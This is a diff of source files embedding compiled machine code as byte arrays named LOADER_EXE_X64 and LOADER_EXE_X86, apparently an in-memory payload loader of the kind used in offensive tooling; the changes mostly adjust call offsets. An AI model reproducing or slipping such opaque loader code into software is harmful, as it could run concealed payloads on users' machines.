0x0f, 0x84, 0xad, 0x00, 0x00, 0x00, 0x8b, 0x93, 0x24, 0x05, 0x00, 0x00,
@ -489,9 +497,9 @@ unsigned char LOADER_EXE_X64[] = {
0x41, 0x3b, 0xc6, 0x76, 0x15, 0x8d, 0x41, 0xfb, 0x41, 0x3b, 0xc6, 0x77,
0x4b, 0x48, 0x8b, 0xd3, 0x48, 0x8b, 0xcf, 0xe8, 0xa8, 0x0f, 0x00, 0x00,
0xeb, 0x3e, 0x4c, 0x8d, 0x44, 0x24, 0x30, 0x48, 0x8b, 0xd3, 0x48, 0x8b,
0xcf, 0xe8, 0x62, 0xfa, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x10, 0x4c, 0x8d,
0xcf, 0xe8, 0x02, 0xfa, 0xff, 0xff, 0x85, 0xc0, 0x74, 0x10, 0x4c, 0x8d,
0x44, 0x24, 0x30, 0x48, 0x8b, 0xd3, 0x48, 0x8b, 0xcf, 0xe8, 0x9e, 0x00,
0x00, 0x00, 0x48, 0x8d, 0x54, 0x24, 0x30, 0x48, 0x8b, 0xcf, 0xe8, 0xd1,
0x00, 0x00, 0x48, 0x8d, 0x54, 0x24, 0x30, 0x48, 0x8b, 0xcf, 0xe8, 0x71,
0xf4, 0xff, 0xff, 0xeb, 0x0b, 0x48, 0x8b, 0xd3, 0x48, 0x8b, 0xcf, 0xe8,
0xb4, 0x04, 0x00, 0x00, 0x83, 0xbf, 0x30, 0x02, 0x00, 0x00, 0x03, 0x75,
0x08, 0xeb, 0xfe, 0x41, 0xbe, 0x01, 0x00, 0x00, 0x00, 0x8b, 0x87, 0x20,
@ -687,7 +695,7 @@ unsigned char LOADER_EXE_X64[] = {
0x10, 0x49, 0x03, 0xf8, 0x4d, 0x03, 0xf8, 0x48, 0x8b, 0x0f, 0x33, 0xc0,
0x48, 0x85, 0xc9, 0x74, 0x55, 0x79, 0x08, 0x44, 0x8b, 0xc9, 0x45, 0x33,
0xc0, 0xeb, 0x2c, 0x4e, 0x8d, 0x24, 0x01, 0x41, 0x39, 0x46, 0x04, 0x74,
0x1a, 0x49, 0x8d, 0x54, 0x24, 0x02, 0x48, 0x8b, 0xce, 0xe8, 0x32, 0xf0,
0x1a, 0x49, 0x8d, 0x54, 0x24, 0x02, 0x48, 0x8b, 0xce, 0xe8, 0xd2, 0xef,
0xff, 0xff, 0x85, 0xc0, 0x74, 0x09, 0x48, 0x8b, 0x86, 0xe0, 0x01, 0x00,
0x00, 0xeb, 0x13, 0x45, 0x33, 0xc9, 0x4d, 0x8d, 0x44, 0x24, 0x02, 0x49,
0x8b, 0xd5, 0x48, 0x8b, 0xce, 0xe8, 0x66, 0x0c, 0x00, 0x00, 0x49, 0x89,
@ -833,24 +841,24 @@ unsigned char LOADER_EXE_X64[] = {
0x4c, 0x24, 0x28, 0x44, 0x8b, 0xcb, 0x33, 0xc9, 0x48, 0x89, 0x44, 0x24,
0x20, 0x33, 0xd2, 0xff, 0x56, 0x70, 0x83, 0x65, 0xe8, 0x00, 0x48, 0x8d,
0x45, 0x80, 0x83, 0x65, 0xf8, 0x00, 0x48, 0x8d, 0x55, 0x08, 0x48, 0x89,
0x45, 0xe0, 0x48, 0x8b, 0xce, 0x48, 0x8d, 0x05, 0x74, 0xdb, 0xff, 0xff,
0x48, 0x89, 0x75, 0x38, 0x48, 0x89, 0x45, 0x80, 0x48, 0x8d, 0x05, 0xf9,
0xd9, 0xff, 0xff, 0x48, 0x89, 0x45, 0x88, 0x48, 0x8d, 0x05, 0x56, 0xda,
0xff, 0xff, 0x48, 0x89, 0x45, 0x90, 0x48, 0x8d, 0x05, 0xd3, 0xda, 0xff,
0xff, 0x48, 0x89, 0x45, 0x98, 0x48, 0x8d, 0x05, 0x50, 0xda, 0xff, 0xff,
0x48, 0x89, 0x45, 0xa0, 0x48, 0x8d, 0x05, 0x41, 0xda, 0xff, 0xff, 0x48,
0x89, 0x45, 0xa8, 0x48, 0x8d, 0x05, 0x36, 0xda, 0xff, 0xff, 0x48, 0x89,
0x45, 0xb0, 0x48, 0x8d, 0x05, 0x2b, 0xda, 0xff, 0xff, 0x48, 0x89, 0x45,
0xb8, 0x48, 0x8d, 0x05, 0xb8, 0xda, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc0,
0x48, 0x8d, 0x05, 0x15, 0xda, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc8, 0x48,
0x8d, 0x05, 0x0a, 0xda, 0xff, 0xff, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x8d,
0x44, 0x24, 0x50, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8d, 0x05, 0x92, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x50, 0x48, 0x8d, 0x05, 0x76, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x58, 0x48, 0x8d, 0x05, 0xd2, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x60, 0x48, 0x8d, 0x05, 0x66, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x68, 0x48, 0x8d, 0x05, 0x5a, 0xd9,
0x45, 0xe0, 0x48, 0x8b, 0xce, 0x48, 0x8d, 0x05, 0x14, 0xdb, 0xff, 0xff,
0x48, 0x89, 0x75, 0x38, 0x48, 0x89, 0x45, 0x80, 0x48, 0x8d, 0x05, 0x99,
0xd9, 0xff, 0xff, 0x48, 0x89, 0x45, 0x88, 0x48, 0x8d, 0x05, 0xf6, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x45, 0x90, 0x48, 0x8d, 0x05, 0x73, 0xda, 0xff,
0xff, 0x48, 0x89, 0x45, 0x98, 0x48, 0x8d, 0x05, 0xf0, 0xd9, 0xff, 0xff,
0x48, 0x89, 0x45, 0xa0, 0x48, 0x8d, 0x05, 0xe1, 0xd9, 0xff, 0xff, 0x48,
0x89, 0x45, 0xa8, 0x48, 0x8d, 0x05, 0xd6, 0xd9, 0xff, 0xff, 0x48, 0x89,
0x45, 0xb0, 0x48, 0x8d, 0x05, 0xcb, 0xd9, 0xff, 0xff, 0x48, 0x89, 0x45,
0xb8, 0x48, 0x8d, 0x05, 0x58, 0xda, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc0,
0x48, 0x8d, 0x05, 0xb5, 0xd9, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc8, 0x48,
0x8d, 0x05, 0xaa, 0xd9, 0xff, 0xff, 0x48, 0x89, 0x45, 0xd0, 0x48, 0x8d,
0x44, 0x24, 0x50, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8d, 0x05, 0x32, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x50, 0x48, 0x8d, 0x05, 0x16, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x58, 0x48, 0x8d, 0x05, 0x72, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x60, 0x48, 0x8d, 0x05, 0x06, 0xd9,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x68, 0x48, 0x8d, 0x05, 0xfa, 0xd8,
0xff, 0xff, 0x48, 0x89, 0x44, 0x24, 0x70, 0x48, 0x8d, 0x45, 0x40, 0x48,
0x89, 0x45, 0x08, 0x48, 0x89, 0x75, 0x00, 0xe8, 0x90, 0xe5, 0xff, 0xff,
0x89, 0x45, 0x08, 0x48, 0x89, 0x75, 0x00, 0xe8, 0x30, 0xe5, 0xff, 0xff,
0x33, 0xd2, 0x33, 0xc9, 0xff, 0x96, 0xa8, 0x01, 0x00, 0x00, 0x85, 0xc0,
0x0f, 0x85, 0x4c, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x60, 0x03, 0x00,
0x00, 0x33, 0xd2, 0x4c, 0x8d, 0x8e, 0xd0, 0x08, 0x00, 0x00, 0x48, 0x89,
@ -924,12 +932,12 @@ unsigned char LOADER_EXE_X64[] = {
0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x82, 0x45, 0x85, 0xff, 0x74,
0x38, 0x85, 0xed, 0x74, 0x14, 0xff, 0xd3, 0x48, 0x8b, 0xd8, 0x41, 0xb9,
0x01, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x65, 0xff, 0xff,
0xff, 0x48, 0x8b, 0x13, 0x48, 0x8b, 0xce, 0xe8, 0xa4, 0xe5, 0xff, 0xff,
0xff, 0x48, 0x8b, 0x13, 0x48, 0x8b, 0xce, 0xe8, 0x44, 0xe5, 0xff, 0xff,
0x41, 0xb9, 0x01, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x4c, 0xff,
0xff, 0xff, 0x48, 0x8b, 0x44, 0x24, 0x28, 0xeb, 0x35, 0x85, 0xed, 0x74,
0x14, 0xff, 0xd3, 0x48, 0x8b, 0xd8, 0x41, 0xb9, 0x01, 0x00, 0x00, 0x00,
0x48, 0x85, 0xc0, 0x0f, 0x84, 0x2d, 0xff, 0xff, 0xff, 0x48, 0x8b, 0x13,
0x48, 0x8b, 0xce, 0xe8, 0x6c, 0xe5, 0xff, 0xff, 0x41, 0xb9, 0x01, 0x00,
0x48, 0x8b, 0xce, 0xe8, 0x0c, 0xe5, 0xff, 0xff, 0x41, 0xb9, 0x01, 0x00,
0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x14, 0xff, 0xff, 0xff, 0x49, 0x8b,
0x46, 0x08, 0x48, 0x89, 0x03, 0xe9, 0x08, 0xff, 0xff, 0xff, 0x48, 0x8b,
0x3f, 0x48, 0x83, 0x7f, 0x30, 0x00, 0x0f, 0x85, 0xf3, 0xfe, 0xff, 0xff,
@ -985,7 +993,7 @@ unsigned char LOADER_EXE_X64[] = {
0x73, 0x12, 0x8b, 0xca, 0xff, 0xc2, 0x42, 0x8a, 0x04, 0x01, 0x88, 0x44,
0x0c, 0x60, 0x46, 0x38, 0x1c, 0x02, 0x75, 0xe9, 0x8b, 0xc2, 0x4c, 0x8d,
0x4c, 0x24, 0x60, 0x4c, 0x8d, 0x44, 0x24, 0x20, 0x48, 0x8b, 0xd7, 0x49,
0x8b, 0xca, 0x44, 0x88, 0x5c, 0x04, 0x60, 0xe8, 0xfc, 0xdc, 0xff, 0xff,
0x8b, 0xca, 0x44, 0x88, 0x5c, 0x04, 0x60, 0xe8, 0x9c, 0xdc, 0xff, 0xff,
0x48, 0x8b, 0xd8, 0x48, 0x8b, 0xc3, 0xeb, 0x12, 0x44, 0x2b, 0x4e, 0x10,
0x43, 0x8b, 0x1c, 0x8e, 0x48, 0x03, 0xdf, 0xe9, 0x40, 0xff, 0xff, 0xff,
0x33, 0xc0, 0x48, 0x8b, 0x9c, 0x24, 0xf8, 0x00, 0x00, 0x00, 0x48, 0x81,
@ -996,7 +1004,7 @@ unsigned char LOADER_EXE_X64[] = {
0x00, 0x49, 0x8b, 0xf8, 0x48, 0x8b, 0xf2, 0x48, 0x8b, 0xe9, 0x45, 0x33,
0xd2, 0x4c, 0x8b, 0x48, 0x60, 0x49, 0x8b, 0x41, 0x18, 0x48, 0x8b, 0x58,
0x10, 0xeb, 0x1c, 0x4d, 0x85, 0xd2, 0x75, 0x20, 0x4c, 0x8b, 0xcf, 0x4c,
0x8b, 0xc6, 0x48, 0x8b, 0xd0, 0x48, 0x8b, 0xcd, 0xe8, 0xbf, 0xda, 0xff,
0x8b, 0xc6, 0x48, 0x8b, 0xd0, 0x48, 0x8b, 0xcd, 0xe8, 0x5f, 0xda, 0xff,
0xff, 0x48, 0x8b, 0x1b, 0x4c, 0x8b, 0xd0, 0x48, 0x8b, 0x43, 0x30, 0x48,
0x85, 0xc0, 0x75, 0xdb, 0x48, 0x8b, 0x5c, 0x24, 0x30, 0x49, 0x8b, 0xc2,
0x48, 0x8b, 0x6c, 0x24, 0x38, 0x48, 0x8b, 0x74, 0x24, 0x40, 0x48, 0x83,

271
loader_exe_x86.go
View File

@ -7,17 +7,17 @@ var LOADER_EXE_X86 = []byte{
0xe4, 0x02, 0x00, 0x00, 0x33, 0xdb, 0x57, 0x8b, 0xfb, 0x39, 0x9e, 0x38,
0x02, 0x00, 0x00, 0x0f, 0x84, 0xea, 0x00, 0x00, 0x00, 0xff, 0x76, 0x2c,
0xff, 0x76, 0x28, 0xff, 0xb6, 0x8c, 0x00, 0x00, 0x00, 0xff, 0xb6, 0x88,
0x00, 0x00, 0x00, 0x56, 0xe8, 0x45, 0x28, 0x00, 0x00, 0x8b, 0xf8, 0x83,
0x00, 0x00, 0x00, 0x56, 0xe8, 0x99, 0x28, 0x00, 0x00, 0x8b, 0xf8, 0x83,
0xc4, 0x14, 0x85, 0xff, 0x0f, 0x84, 0xc0, 0x00, 0x00, 0x00, 0x53, 0x53,
0x56, 0xe8, 0x2d, 0x26, 0x00, 0x00, 0x8b, 0xc8, 0xb8, 0xd7, 0x22, 0x40,
0x00, 0x2d, 0x7b, 0x36, 0x40, 0x00, 0x03, 0xc8, 0x51, 0x53, 0x53, 0xff,
0x56, 0xe8, 0x81, 0x26, 0x00, 0x00, 0x8b, 0xc8, 0xb8, 0x2b, 0x23, 0x40,
0x00, 0x2d, 0xcf, 0x36, 0x40, 0x00, 0x03, 0xc8, 0x51, 0x53, 0x53, 0xff,
0xd7, 0xff, 0x76, 0x2c, 0x8b, 0xf8, 0xff, 0x76, 0x28, 0xff, 0xb6, 0x0c,
0x02, 0x00, 0x00, 0xff, 0xb6, 0x08, 0x02, 0x00, 0x00, 0x56, 0xe8, 0x03,
0x02, 0x00, 0x00, 0xff, 0xb6, 0x08, 0x02, 0x00, 0x00, 0x56, 0xe8, 0x57,
0x28, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x89, 0x44, 0x24, 0x28, 0xff, 0x76,
0x28, 0xff, 0xb6, 0xa4, 0x00, 0x00, 0x00, 0xff, 0xb6, 0xa0, 0x00, 0x00,
0x00, 0x56, 0xe8, 0xe7, 0x27, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x8b, 0xd8,
0x00, 0x56, 0xe8, 0x3b, 0x28, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x8b, 0xd8,
0xff, 0x76, 0x28, 0xff, 0xb6, 0xac, 0x00, 0x00, 0x00, 0xff, 0xb6, 0xa8,
0x00, 0x00, 0x00, 0x56, 0xe8, 0xcd, 0x27, 0x00, 0x00, 0x83, 0xc4, 0x3c,
0x00, 0x00, 0x00, 0x56, 0xe8, 0x21, 0x28, 0x00, 0x00, 0x83, 0xc4, 0x3c,
0x8b, 0xe8, 0x6a, 0x00, 0xff, 0x56, 0x38, 0x83, 0x7c, 0x24, 0x10, 0x00,
0x89, 0x44, 0x24, 0x14, 0x74, 0x4c, 0x85, 0xdb, 0x74, 0x48, 0x85, 0xed,
0x74, 0x44, 0x8d, 0x44, 0x24, 0x18, 0xc7, 0x44, 0x24, 0x18, 0x07, 0x00,
@ -25,18 +25,18 @@ var LOADER_EXE_X86 = []byte{
0x00, 0x00, 0x03, 0x44, 0x24, 0x14, 0x83, 0xa4, 0x24, 0xdc, 0x00, 0x00,
0x00, 0xfc, 0x89, 0x84, 0x24, 0xd0, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24,
0x18, 0x6a, 0x00, 0x50, 0xff, 0x54, 0x24, 0x18, 0xeb, 0x0c, 0x83, 0xc8,
0xff, 0xeb, 0x09, 0x56, 0xe8, 0xc6, 0x11, 0x00, 0x00, 0x59, 0x8b, 0xc7,
0xff, 0xeb, 0x09, 0x56, 0xe8, 0x1a, 0x12, 0x00, 0x00, 0x59, 0x8b, 0xc7,
0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0xd4, 0x02, 0x00, 0x00, 0xc3, 0x8b,
0x44, 0x24, 0x04, 0x83, 0xc0, 0x04, 0xf0, 0xff, 0x00, 0x8b, 0x00, 0xc2,
0x04, 0x00, 0xb8, 0x01, 0x40, 0x00, 0x80, 0xc2, 0x08, 0x00, 0x56, 0x57,
0xe8, 0x3e, 0x25, 0x00, 0x00, 0x8b, 0x74, 0x24, 0x10, 0xb9, 0xad, 0x11,
0x40, 0x00, 0xbf, 0x7b, 0x36, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b,
0x0e, 0x89, 0x01, 0xe8, 0x23, 0x25, 0x00, 0x00, 0xb9, 0x1f, 0x11, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x04, 0xe8, 0x10,
0xe8, 0x92, 0x25, 0x00, 0x00, 0x8b, 0x74, 0x24, 0x10, 0xb9, 0xad, 0x11,
0x40, 0x00, 0xbf, 0xcf, 0x36, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b,
0x0e, 0x89, 0x01, 0xe8, 0x77, 0x25, 0x00, 0x00, 0xb9, 0x1f, 0x11, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x04, 0xe8, 0x64,
0x25, 0x00, 0x00, 0xb9, 0x0c, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1,
0x8b, 0x0e, 0x89, 0x41, 0x08, 0xe8, 0xfd, 0x24, 0x00, 0x00, 0xb9, 0x2e,
0x8b, 0x0e, 0x89, 0x41, 0x08, 0xe8, 0x51, 0x25, 0x00, 0x00, 0xb9, 0x2e,
0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x0c,
0xe8, 0xea, 0x24, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf,
0xe8, 0x3e, 0x25, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf,
0x03, 0xc1, 0x8b, 0x0e, 0x5f, 0x89, 0x41, 0x10, 0x8b, 0x44, 0x24, 0x08,
0x83, 0x66, 0x04, 0x00, 0x89, 0x46, 0x08, 0x5e, 0xc3, 0x8b, 0x4c, 0x24,
0x0c, 0x85, 0xc9, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x4d,
@ -56,29 +56,29 @@ var LOADER_EXE_X86 = []byte{
0x83, 0xc6, 0x14, 0x56, 0x8b, 0x06, 0xff, 0x50, 0x04, 0x89, 0x37, 0x33,
0xc0, 0x5f, 0x5e, 0x5d, 0xc2, 0x14, 0x00, 0x8b, 0x44, 0x24, 0x04, 0x8b,
0x40, 0x2c, 0xff, 0x50, 0x54, 0x8b, 0x4c, 0x24, 0x08, 0x89, 0x01, 0x33,
0xc0, 0xc2, 0x08, 0x00, 0x56, 0x57, 0xe8, 0xf4, 0x23, 0x00, 0x00, 0x8b,
0x74, 0x24, 0x10, 0xb9, 0xbe, 0x13, 0x40, 0x00, 0xbf, 0x7b, 0x36, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x01, 0xe8, 0xd9, 0x23,
0xc0, 0xc2, 0x08, 0x00, 0x56, 0x57, 0xe8, 0x48, 0x24, 0x00, 0x00, 0x8b,
0x74, 0x24, 0x10, 0xb9, 0xbe, 0x13, 0x40, 0x00, 0xbf, 0xcf, 0x36, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x01, 0xe8, 0x2d, 0x24,
0x00, 0x00, 0xb9, 0x1f, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b,
0x0e, 0x89, 0x41, 0x04, 0xe8, 0xc6, 0x23, 0x00, 0x00, 0xb9, 0x0c, 0x12,
0x0e, 0x89, 0x41, 0x04, 0xe8, 0x1a, 0x24, 0x00, 0x00, 0xb9, 0x0c, 0x12,
0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x08, 0xe8,
0xb3, 0x23, 0x00, 0x00, 0xb9, 0x6b, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x0c, 0xe8, 0xa0, 0x23, 0x00, 0x00, 0xb9,
0x07, 0x24, 0x00, 0x00, 0xb9, 0x6b, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x0c, 0xe8, 0xf4, 0x23, 0x00, 0x00, 0xb9,
0x21, 0x12, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41,
0x10, 0xe8, 0x8d, 0x23, 0x00, 0x00, 0xb9, 0x1c, 0x12, 0x40, 0x00, 0x2b,
0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x14, 0xe8, 0x7a, 0x23, 0x00,
0x10, 0xe8, 0xe1, 0x23, 0x00, 0x00, 0xb9, 0x1c, 0x12, 0x40, 0x00, 0x2b,
0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x14, 0xe8, 0xce, 0x23, 0x00,
0x00, 0xb9, 0xb9, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e,
0x89, 0x41, 0x18, 0xe8, 0x67, 0x23, 0x00, 0x00, 0xb9, 0x1c, 0x12, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x1c, 0xe8, 0x54,
0x89, 0x41, 0x18, 0xe8, 0xbb, 0x23, 0x00, 0x00, 0xb9, 0x1c, 0x12, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x1c, 0xe8, 0xa8,
0x23, 0x00, 0x00, 0xb9, 0x6e, 0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1,
0x8b, 0x0e, 0x89, 0x41, 0x20, 0xe8, 0x41, 0x23, 0x00, 0x00, 0xb9, 0x69,
0x8b, 0x0e, 0x89, 0x41, 0x20, 0xe8, 0x95, 0x23, 0x00, 0x00, 0xb9, 0x69,
0x13, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x24,
0xe8, 0x2e, 0x23, 0x00, 0x00, 0xb9, 0x69, 0x13, 0x40, 0x00, 0x2b, 0xcf,
0xe8, 0x82, 0x23, 0x00, 0x00, 0xb9, 0x69, 0x13, 0x40, 0x00, 0x2b, 0xcf,
0x03, 0xc1, 0x8b, 0x0e, 0x5f, 0x89, 0x41, 0x28, 0x8b, 0x44, 0x24, 0x08,
0x83, 0x66, 0x04, 0x00, 0x89, 0x46, 0x2c, 0x5e, 0xc3, 0x33, 0xc0, 0xc2,
0x04, 0x00, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x2c, 0x33, 0xc0, 0x56, 0x6a,
0x20, 0x50, 0x89, 0x45, 0xf4, 0x89, 0x45, 0xf8, 0x89, 0x45, 0xfc, 0x8d,
0x45, 0xd4, 0x50, 0xe8, 0x8b, 0x29, 0x00, 0x00, 0x8b, 0x75, 0x0c, 0x8d,
0x45, 0xd4, 0x50, 0xe8, 0xdf, 0x29, 0x00, 0x00, 0x8b, 0x75, 0x0c, 0x8d,
0x4d, 0xd4, 0x83, 0xc4, 0x0c, 0x8b, 0x06, 0x51, 0x56, 0xff, 0x50, 0x0c,
0x85, 0xc0, 0x75, 0x12, 0x8b, 0x06, 0x8d, 0x4d, 0xfc, 0x51, 0x8d, 0x4d,
0xf8, 0x51, 0x8d, 0x4d, 0xf4, 0x51, 0x56, 0xff, 0x50, 0x10, 0x33, 0xc0,
@ -98,38 +98,38 @@ var LOADER_EXE_X86 = []byte{
0x08, 0xc3, 0x8b, 0x44, 0x24, 0x14, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc2,
0x14, 0x00, 0x8b, 0x44, 0x24, 0x04, 0x03, 0x44, 0x24, 0x08, 0xc3, 0x51,
0x53, 0x56, 0x8b, 0x74, 0x24, 0x10, 0x8d, 0x86, 0x54, 0x03, 0x00, 0x00,
0x50, 0x56, 0xe8, 0x0a, 0x22, 0x00, 0x00, 0x8b, 0xd8, 0x59, 0x59, 0x85,
0x50, 0x56, 0xe8, 0x5e, 0x22, 0x00, 0x00, 0x8b, 0xd8, 0x59, 0x59, 0x85,
0xdb, 0x75, 0x06, 0x40, 0xe9, 0xd5, 0x00, 0x00, 0x00, 0x55, 0x57, 0x6a,
0x00, 0x8d, 0x86, 0xc8, 0x05, 0x00, 0x00, 0x50, 0x53, 0x56, 0xe8, 0x88,
0x00, 0x8d, 0x86, 0xc8, 0x05, 0x00, 0x00, 0x50, 0x53, 0x56, 0xe8, 0xdc,
0x22, 0x00, 0x00, 0x8b, 0xe8, 0x83, 0xc4, 0x10, 0x85, 0xed, 0x0f, 0x84,
0xb2, 0x00, 0x00, 0x00, 0xbf, 0x48, 0x14, 0x40, 0x00, 0x81, 0xef, 0x3c,
0x14, 0x40, 0x00, 0x0f, 0x88, 0xa1, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24,
0x18, 0x50, 0x6a, 0x40, 0x57, 0x55, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x0f,
0x84, 0x8d, 0x00, 0x00, 0x00, 0x57, 0xe8, 0xa8, 0x21, 0x00, 0x00, 0xb9,
0x3c, 0x14, 0x40, 0x00, 0x81, 0xe9, 0x7b, 0x36, 0x40, 0x00, 0x03, 0xc1,
0x50, 0x55, 0xe8, 0x0c, 0x28, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44,
0x84, 0x8d, 0x00, 0x00, 0x00, 0x57, 0xe8, 0xfc, 0x21, 0x00, 0x00, 0xb9,
0x3c, 0x14, 0x40, 0x00, 0x81, 0xe9, 0xcf, 0x36, 0x40, 0x00, 0x03, 0xc1,
0x50, 0x55, 0xe8, 0x60, 0x28, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44,
0x24, 0x10, 0x50, 0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48,
0x6a, 0x00, 0x8d, 0x86, 0xd8, 0x05, 0x00, 0x00, 0x50, 0x53, 0x56, 0xe8,
0x1b, 0x22, 0x00, 0x00, 0x8b, 0xe8, 0x83, 0xc4, 0x10, 0x85, 0xed, 0x74,
0x6f, 0x22, 0x00, 0x00, 0x8b, 0xe8, 0x83, 0xc4, 0x10, 0x85, 0xed, 0x74,
0x49, 0xbf, 0x5e, 0x14, 0x40, 0x00, 0xbb, 0x52, 0x14, 0x40, 0x00, 0x2b,
0xfb, 0x78, 0x3b, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, 0x40, 0x57, 0x55,
0xff, 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8, 0x46, 0x21, 0x00,
0x00, 0x81, 0xeb, 0x7b, 0x36, 0x40, 0x00, 0x03, 0xc3, 0x50, 0x55, 0xe8,
0xaf, 0x27, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50,
0xff, 0x56, 0x48, 0x85, 0xc0, 0x74, 0x2b, 0x57, 0xe8, 0x9a, 0x21, 0x00,
0x00, 0x81, 0xeb, 0xcf, 0x36, 0x40, 0x00, 0x03, 0xc3, 0x50, 0x55, 0xe8,
0x03, 0x28, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x10, 0x50,
0xff, 0x74, 0x24, 0x1c, 0x57, 0x55, 0xff, 0x56, 0x48, 0x33, 0xc0, 0x40,
0xeb, 0x02, 0x33, 0xc0, 0x5f, 0x5d, 0x5e, 0x5b, 0x59, 0xc3, 0x55, 0x8b,
0xec, 0x51, 0x56, 0x8b, 0x75, 0x08, 0x57, 0x8d, 0x86, 0x68, 0x03, 0x00,
0x00, 0x50, 0x56, 0xe8, 0x0d, 0x21, 0x00, 0x00, 0x6a, 0x00, 0x8d, 0x8e,
0xe8, 0x05, 0x00, 0x00, 0x51, 0x50, 0x56, 0xe8, 0x9b, 0x21, 0x00, 0x00,
0x00, 0x50, 0x56, 0xe8, 0x61, 0x21, 0x00, 0x00, 0x6a, 0x00, 0x8d, 0x8e,
0xe8, 0x05, 0x00, 0x00, 0x51, 0x50, 0x56, 0xe8, 0xef, 0x21, 0x00, 0x00,
0x8b, 0xf8, 0x83, 0xc4, 0x18, 0x85, 0xff, 0x74, 0x34, 0x8d, 0x45, 0x08,
0x50, 0x6a, 0x40, 0x6a, 0x04, 0x57, 0xff, 0x56, 0x48, 0x85, 0xc0, 0x74,
0x24, 0x6a, 0x04, 0x8d, 0x86, 0x0d, 0x06, 0x00, 0x00, 0x50, 0x57, 0xe8,
0x43, 0x27, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x45, 0xfc, 0x50, 0xff,
0x97, 0x27, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x45, 0xfc, 0x50, 0xff,
0x75, 0x08, 0x6a, 0x04, 0x57, 0xff, 0x56, 0x48, 0x33, 0xc0, 0x40, 0xeb,
0x02, 0x33, 0xc0, 0x5f, 0x5e, 0xc9, 0xc3, 0x81, 0xec, 0xec, 0x02, 0x00,
0x00, 0x53, 0x55, 0x56, 0x8b, 0xb4, 0x24, 0xfc, 0x02, 0x00, 0x00, 0x8d,
0x44, 0x24, 0x34, 0x57, 0x6a, 0x3c, 0x33, 0xed, 0x33, 0xdb, 0x21, 0x5c,
0x24, 0x24, 0xbf, 0x00, 0x03, 0x60, 0x04, 0x55, 0x50, 0xe8, 0x21, 0x27,
